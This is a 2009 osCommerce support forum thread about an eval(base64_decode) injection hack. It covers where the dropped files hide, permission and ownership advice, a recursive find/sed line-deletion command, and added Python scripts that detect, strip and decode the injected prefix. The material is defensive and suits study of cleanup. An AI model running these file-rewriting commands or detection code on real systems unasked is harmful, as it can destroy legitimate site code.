FIMBLE (author), posted October 5, 2009

You will have to search for the decoder online; it has been encrypted quite a lot. The code will be in every PHP file you have on the account, regardless of folder names.

Sometimes you're the dog and sometimes the lamp post
Guest, posted October 5, 2009

Here is another question:

1) Let's say I find out where the hack was done and erase the file. Is there a need then to still remove from all my files the <? /**/eval(base64_decode('aWYo...... ? Would it cause any harm at all now that I have removed the source file? Would I be penalized by search engines? I have about 10 different PHP scripts on my hosting account (blogs, forums, etc.) and they have all been infected!

2) How are they able to add that code to all pages, even if they have permission lower than 755?

I am so pissed off right now :angry:

Ricardo
FIMBLE (author), posted October 5, 2009

It's a bad hack for sure. You need to remove all traces of the code, for thoroughness and the security of your site; leaving it is not a good idea. Also remove filemanager.php and its links, then rename the admin.

Nic
Guest, posted October 5, 2009

> It's a bad hack for sure. You need to remove all traces of the code, for thoroughness and the security of your site; leaving it is not a good idea. Also remove filemanager.php and its links, then rename the admin.
>
> Nic

Hey Nic, thank you for your replies! I can't seem to find the decoder for "gzdecode" or "gzinflate". Do you happen to know of a link or a script I can use to decode the rest? Thanks!
FIMBLE (author), posted October 5, 2009

This will give you some info; if it's not enough, have a search of Google: http://www.whenpenguinsattack.com/category/php/
Guest, posted October 6, 2009

Can someone tell me if there is a way to remove the hacker's code from each file by using a search and replace application? If so, can you recommend one and explain basically what to do? Thanks,

Ricardo
FIMBLE (author), posted October 6, 2009

> Can someone tell me if there is a way to remove the hacker's code from each file by using a search and replace application? If so, can you recommend one and explain basically what to do? Thanks,
>
> Ricardo

Search and replace is the fastest way to do it if you do not have a backup to restore from. Copy the top two lines; they should be the malicious code and the <?php tag, like this. Add this to the search box:

<?php //eval(base64_decode('...')); ?> <?php

In the replace box add:

<?php

then go search and replace. This will be OK for stock osC pages, but you will still need to search for pages that use <? rather than <?php, as some contributions will, or your own custom pages.

Nic
FIMBLE (author), posted October 6, 2009

If you have not yet decoded the eval code, this is where the files to be removed are to be found:

/home/xxxxxx/x/x/x/xxxxxxx/html/xxxxxxx/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php

I added the X's to protect your usernames. There could be anything up to 40-odd files placed in this folder that do not belong.

Nic
mhsuffolk, posted October 6, 2009

I have a renamed admin directory and have deleted filemanager.php and references to it. I have the Site Monitor contribution installed.

My questions:

1. Will Site Monitor spot the hack, or does the hack disable Site Monitor?
2. I have all folders at 755 and the 2 configure.php files at 400. Is this correct, or should the folders be lower?

Martin

Live shop Phoenix 1.0.8.4 on PHP 7.4. Working my way up the versions.
FIMBLE (author), posted October 6, 2009

1) The new Site Monitor does give you hints; however, you should use it with caution, as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as PHP code. So you will get reports of possible infection when none exists. It's still a good thing to get used to, though, and it will notify you of changes to your files, which the attack will certainly do.

2) Read post #2 about permissions, as Matt makes a good point. Though for most hosts 755 and 400 is good. The 400 worries me a little, as a lot of sites will not function at this level, which leads me to think that maybe you are one of the people Matt is talking about. You will need to check with your host.

Nic
mhsuffolk, posted October 6, 2009

> It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories. A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.

Thanks Nic. I use United Hosting and have always had folders at 755 and configures at 400, with no perceivable problems; the store has worked fine since its launch in June.

I am confused by the term "web user". I have my own domain name with a non-shared SSL, but on a shared server; am I the web user, and if not, who is? Should I be setting my files to 444 and folders to 555? I think United can handle these settings, but if you explain what is correct it will help me immensely.

Martin
FIMBLE (author), posted October 6, 2009

The easiest way, other than asking your host, is to set the permissions of the configure.php file to 644 and see if you get the red error warning across the top of your site. If so, then you are likely to need to set your permissions lower. I have to say the host you mention does have a totally fantastic name for itself.

Nic
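To make Matt's ownership point concrete (an added example, not from this thread; it assumes a POSIX host and only the Python 3 standard library), the audit below flags everything the PHP process could write, judged by who owns each object rather than by the octal mode alone. A 755 folder owned by the same account PHP runs as is reported, while the same tree seen from a separate web user comes out clean; the mini-shop layout is constructed for the demo.

```python
import os
import shutil
import stat
import tempfile

def writable_by(st, uid, gids):
    """True if a process running as uid (member of gids) could modify this object,
    judged the way the kernel does: owner bits if it owns it, else group, else other."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def audit(root, web_uid, web_gids):
    """Return [(relative_path, octal_mode)] for every file or directory under root
    that the web-server identity could write to. Symlinks are skipped."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by(st, web_uid, web_gids):
                findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)

def demo():
    """Constructed mini-shop: catalog/ at 755 holding index.php (644) and configure.php
    (400), images/ at 555 holding a 444 file. Audit it as the account that owns the
    files (typical shared host) and again as a separate web user (hypothetical uid+1)."""
    root = tempfile.mkdtemp()
    dirs = {"catalog": 0o755, "images": 0o555}
    for name in dirs:
        os.mkdir(os.path.join(root, name))
    files = (("catalog/index.php", 0o644), ("catalog/configure.php", 0o400),
             ("images/logo.gif", 0o444))
    for rel, mode in files:
        open(os.path.join(root, rel), "w").close()
        os.chmod(os.path.join(root, rel), mode)
    for name, mode in dirs.items():  # chmod after populating, so 555 does not block creation
        os.chmod(os.path.join(root, name), mode)
    same_user = audit(root, os.getuid(), {os.getgid()})
    other_user = audit(root, os.getuid() + 1, set())
    for name in dirs:  # restore write so the temp tree can be removed
        os.chmod(os.path.join(root, name), 0o755)
    shutil.rmtree(root)
    return same_user, other_user
```

Run `demo()` on the real shop root instead of the temp tree by calling `audit(path, uid, gids)` with the uid and groups your host says PHP executes under.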
headbanging, posted October 6, 2009

Just found out I've been done as well, and the advice in this thread has been brilliant. They hid the files in catalog/includes/languages/german/modules/newsletters!! There were about 40 or so files there. Not surprised to find them hidden in the German language folder, as I never look there. Needless to say, all other languages have now been deleted. Does anyone know if cPanel has a compare/delete tool in it? It would just be easier than manually deleting all the code. Thanks
FIMBLE (author), posted October 6, 2009

I am not aware of one; most FTP programs do, well, mine does anyhow. It's good practice to check each file to ensure you have gotten rid of it completely anyhow, IMHO.

Nic
yulem, posted October 6, 2009

With the eval(base64_decode hack going around the internet, I found this bit of code (if you're on a Linux/Unix server) very valuable in removing hacks like the one above. Change it to fit your specifics and use at your own risk.

find . -name "*.php" -exec sed -e '/eval(base64_decode*/d' -i.bak {} \;

Navigate to your root/catalog directory to execute. It will recursively find every file ending with "php", create a backup of the file with a ".bak" extension, find and replace ANY line within the file containing "eval(base64_decode*", then save the edited original file.

You must edit "*.php" to process the files pertaining to your site. You must edit "eval(base64_decode*" to match a unique snippet of the hack code (try to avoid strings that contain weird characters (/ . * & ! ` ~ , etc.) that need escaping, to make your life easy).

As already noted, you will probably need to fix/remove file_manager.php, plus find and delete the deep-planted files. A current backup is always easier.

Yulem
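A narrower alternative to the line-deleting sed above, as an added example that is not from this thread: a Python 3 script that strips only the injected prefix described earlier (the eval(base64_decode('...')) block wrapped in its own PHP tag in front of the file's real opening tag, in either the <?php or the <? form), keeps a .bak copy of each file it rewrites, and decodes the payload to report the folder the dropped files live in, as Nic did by hand. The drop path and payload below are constructed stand-ins, not the thread's real string.

```python
import base64
import re
import shutil
import tempfile
from pathlib import Path

# Injected prefix as it appears in this thread: a PHP tag wrapping eval(base64_decode('...'))
# in front of the file's own opening tag. Anchored to the start of the file, so osCommerce's
# legitimate eval() calls further down are never touched.
INJECTED = re.compile(
    r"\A\s*<\?(?:php)?\s*(?://|/\*\*/)?\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\s*"
)

def strip_injection(source):
    """Return (cleaned_source, payload_b64); payload_b64 is None for a clean file."""
    m = INJECTED.match(source)
    return (source[m.end():], m.group(1)) if m else (source, None)

def planted_path(payload_b64):
    """Decode the payload and return the file it include_once()s: that folder is where
    the dropped files (style.css.php and friends) have to be hunted down."""
    decoded = base64.b64decode(payload_b64).decode("latin-1")
    m = re.search(r"file_exists\('([^']+)'\)", decoded)
    return m.group(1) if m else None

def clean_tree(root, dry_run=True):
    """Map each infected .php file under root to its planted path. With dry_run=False
    the prefix is removed and the original is kept beside it as <name>.bak."""
    root, found = Path(root), {}
    for path in root.rglob("*.php"):
        cleaned, payload = strip_injection(path.read_text(encoding="latin-1"))
        if payload is None:
            continue
        found[path.relative_to(root).as_posix()] = planted_path(payload)
        if not dry_run:
            shutil.copy2(path, str(path) + ".bak")
            path.write_text(cleaned, encoding="latin-1")
    return found

# Constructed sample payload: a harmless stand-in carrying a hypothetical drop path in
# the same style as those reported in the thread.
DROP = "/home/example/public_html/catalog/includes/languages/german/modules/newsletters/style.css.php"
SAMPLE_B64 = base64.b64encode(
    ("if(file_exists('%s')){include_once('%s');}" % (DROP, DROP)).encode()
).decode()

def demo():
    """Build a throwaway tree (two infected files, one clean), run a dry pass, then clean
    for real; return (dry_run_report, contents_after_cleaning)."""
    root = Path(tempfile.mkdtemp())
    files = {
        "index.php": "<?php //eval(base64_decode('%s')); ?> <?php echo 'shop'; ?>" % SAMPLE_B64,
        "contrib/page.php": "<? /**/eval(base64_decode('%s')); ?> <? echo 'old'; ?>" % SAMPLE_B64,
        "ok.php": "<?php echo 'fine'; ?>",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body, encoding="latin-1")
    report = clean_tree(root, dry_run=True)
    clean_tree(root, dry_run=False)
    after = {rel: (root / rel).read_text(encoding="latin-1") for rel in files}
    shutil.rmtree(root)
    return report, after
```

Run `clean_tree("/path/to/catalog")` first with the default dry run, check that every reported planted path points at the same dropped folder, and only then rerun with `dry_run=False`.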
germ, posted October 24, 2009

> Question: I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

I'm sure some hacker woke up one morning and decided to hack a million web sites. And while he was at it, advertise the company you mentioned just for "grins and giggles". I'm sure no money changed hands. Quite sure that's what happened.... :-"

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me
jeeperz, posted October 28, 2009

> Permissions are not the determining factor for this attack; it's the presence of the admin folder still called admin, and the filemanager.php. Once in, it will spread to any PHP file, platform/package independent, adding its code as it goes. I can imagine in a lot of cases there will be many more PHP files than osC ones.

Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder. If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack.
FIMBLE (author), posted October 28, 2009

You can tell me if I am incorrect, but this hack actively looks for, amongst others, the osid, then the admin folder, and the easy way in, the filemanager.php. I don't fully understand what you mean about the admin folder; are you referring to the login page in V2.2RC2A or the actual admin index as in V2.2MS, where no protection is available? This is surely why renaming the admin folder and removing the filemanager.php is the recommended course of action.
FIMBLE (author), posted October 28, 2009

I was recently asked by Harald to review this new layer of protection that gives you additional htaccess protection:

http://github.com/haraldpdl/oscommerce2/commit/fd5dff7a3c45511b4902780c67f9609e700dbb51

If used in conjunction with

http://github.com/haraldpdl/oscommerce2/commit/569917f654edab2b07bf61ab8caf2764ba1457c4

it gives you a single login via htaccess. Here are some screenshots of it.

Nic
Guest, posted October 28, 2009

> I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious. I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed? What a mess; we work so hard to get our sites perfect, and also get top rankings, only to be hacked. Weird thing is my site works just fine, but the code is in every PHP file, and the company Forex is listed a million times behind each page in the body.

Hey. This is the exact same thing with me. My website seems to work fine, with the exception that, no matter what I do lately, my website has a very poor ranking compared to what it had a couple of months ago, in spite of all of the optimization I have done with Web SEO. Actually, although I had noticed the eval base64 code at the top of all of my PHP files and didn't know what it was, it was using the Web SEO program and discovering all of the lines of text of keyword saturation in the body of my website with all of this "forex" trading stuff. So, yeah, how best to go about cleaning up my website of all of the malicious code so it doesn't re-perpetuate itself? I am not familiar with using dbase decoders. :'(
proryder2, posted October 30, 2009

I keep getting emails through an email script on my site, and I keep getting more and more. Any ideas what the heck this is? Spammer? Here's a couple of them:

eVRbqY _a href="http://xighsaxkazdh.com/"_xighsaxkazdh_/a_, [ url =http://pujvjjvvxcmv.com/]pujvjjvvxcmv[ /url ], [ link=http://sdxfkydlkpxn.com/]sdxfkydlkpxn[ /link], http://xmteuhyhgedt.com/

Here's one where all the fields were filled in:

Name: hsxkwn
Email: [email protected]
Phone: 80253357799
State: New Mexico
Entered By: customer 2009-10-05 18:15:08
--------------------------------------------------------------------------------
Engine Info:
Engine Type: outboard
--------------------------------------------------------------------------------
Question / Comments: (edit) tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/

Maybe this is how it's getting in, or maybe this has nothing to do with it. Thanks
proryder2, posted October 30, 2009

I forgot to mention I have not yet got the bug, and I have done all the fixes everyone listed. Lately I have been getting about 4 of these a day.
♥Biancoblu, posted October 30, 2009

> How to prevent infection. This is not guaranteed 100% proof, but it is going to help stop re-infection.
>
> Change the name of your admin folder to something less obvious.
> Delete admin/filemanager.php and associated links.
> Ensure that your folder permissions are never set higher than 755.
> Install some security addons. Also some ideas from this post can help you.
>
> If you do nothing, and do not rename your admin folder or delete the filemanager.php, it is not a question of if, more when. There is a lot of fragmented help on the forums; I have pulled some of it together here. Read up all you can; there are a lot of great people posting good information here.

Nic, should admin/define_language.php also be removed?

~ Don't mistake my kindness for weakness ~
JamesJamz, posted November 5, 2009

Hi all, looks like I too was a victim of this hack... Now I have restored a backup from before the hack took place, but now I cannot access the admin panel... I put it in the browser and all it shows is a blank page in Firefox... Anyone have any ideas? All the files are in there... I have even tried using the standard install files... nothing :(
JamesJamz, posted November 9, 2009

Bump... anyone have any idea what's up with my admin panel?